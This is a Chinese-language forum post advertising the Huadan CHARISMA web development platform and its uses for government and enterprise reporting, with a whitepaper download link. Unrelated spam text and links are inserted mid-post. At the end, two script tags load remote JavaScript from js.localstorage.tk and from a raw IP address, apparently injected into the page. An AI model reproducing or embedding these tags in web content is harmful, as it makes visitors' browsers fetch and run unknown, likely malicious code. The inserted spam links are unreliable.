你在这里

华丹CHARISMA智能WEB平台应用简介

1 post / 0 new
read article 韵之骄阳
华丹CHARISMA智能WEB平台应用简介

[SIZE=4][B]华丹CHARISMA智能WEB平台应用简介[/B][/SIZE]
CHARISMA智能WEB平台,简称CHARISMA平台,是一款企业级应用的快速开发平台。
CHARISMA平台采用业界领先的J2EE技术构建,MVC设计模式,B/S的多层结构,具有极高的稳定性、安全性,及可扩展性、可伸缩性、可维护性。为用户提供了“快速、自主、定制”开发各类业务系统强大功能。

显著特点: click the following article

[B]快速开发[/B]:在CHARISMA平台开发业务系统,80%以上模块不需要编写代码(开发业务系统时只需通过WEB页面进行参数定制即可),甚至零编码,开发周期只需传统模式的10%--30%,两个小时内构建一个简单的WEB应用。
[B]充分自主[/B]:由于CHARISMA平台提供并封装所有的系统级应用模块,对开发人员的技术水平要求较低,只要懂一些数据库方面的知识,即可自主快速地开发业务系统。
[B]灵活定制[/B]:根据业务需求、管理思想、工作流程,实时在线定制、维护,打造更加符合自身业务需求的应用系统。

CHARISMA平台充分满足不同客户的不同需求,提供跨行业的多种、灵活、优秀解决方案,为众多的终端客户、软件开发商、系统集成商所认可。现基于平台已成功实现的系统如:OA、CRM、EAI、ERP、MIS、HIS、电子政务平台、信息资源管理系统、信息采集报送平台、集团报表系统、网上直报、多级上报、物流管理系统、连锁店管理系统等 http://crechesentreprises.org/map.

根据不同客户的需求,基于CHARISMA平台实现不同的应用,以下做简单的介绍:
政府机关、企业、事业:
用应一:以CHARISMA平台做为基础支撑平台;[B]一方面应用CHARISMA平台做数据整合工具[/B],实现异构数据源的整合,实现企业应用集成,消除“信息孤岛”。建立总部下设各分支机构横向、纵向的数据共享交换机制,实现多级管理、资源共享的数据平台;
同时利[B]用CHARISMA平台做为快速开发工具[/B],根据自身业务需求、管理思想,自主快速开发各种业务系统。
应用二:以[B]CHARISMA平台做为基础平台[/B],依据本单位自身需求,实时基于平台快速、自主、定制各种应用系统,从而打造统一的资源管理平台。
应用三:实现多级数据上报、汇总
  在政府机关及企业集团的日常工作中,下级单位需要定期向上级逐级申报业务数据,并进行分级数据汇总,制作各类WEB报表。利用CHARISMA平台可以非常轻松实现这种需求。如:“多级上报”、“网上直报”等系统。
应用四:实现数据整合,制作综合查询、分析系统:
  对于政府机关、大的企业集团,在信息化建设过程中,会产生多个数据库,面对分散的数据,领导很难进行决策分析。以[B]CHARISMA平台做数据集成总线[/B],将所有的数据库挂载到平台上,实现不同数据库数据的任意抽取,在线自定义各类WEB报表,构建统一的查询、统计、决策分析管理平台。如:“集团报表平台”、“实时历史数据查询、决策系统”等。

开发商、系统集成商:
应用一:对于开发商而言,可以将整个项目基于CHARISMA平台上开发,降低开发成本及维护成本。特别是对于以前使用PB、VB、DELPHI的开发商,想快速转型到基于J2EE开发WEB应用上来,尤其适合。 如:OA、SCM、CRM、EAI、MIS、ERP等等
应用二:CHARISMA报表引擎可以通过多种方案与业务系统(如:大型的ERP、CRM、OA、电子政务平台等)实现灵活的无缝集成(以插件方式嵌入到系统),不仅方便用户自定义查询、报表模块, 而且可作为系统中综合查询、统计及WEB报表的解决方案。

快速开发平台技术白皮书下载地址:[url]http://www.huadan.biz/downloads/charismawhitedoc.rar[/url]

平台详细资料介绍及试用版下载及典型应用案例分析,请登陆:[url]www.huadan.biz[/url]<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>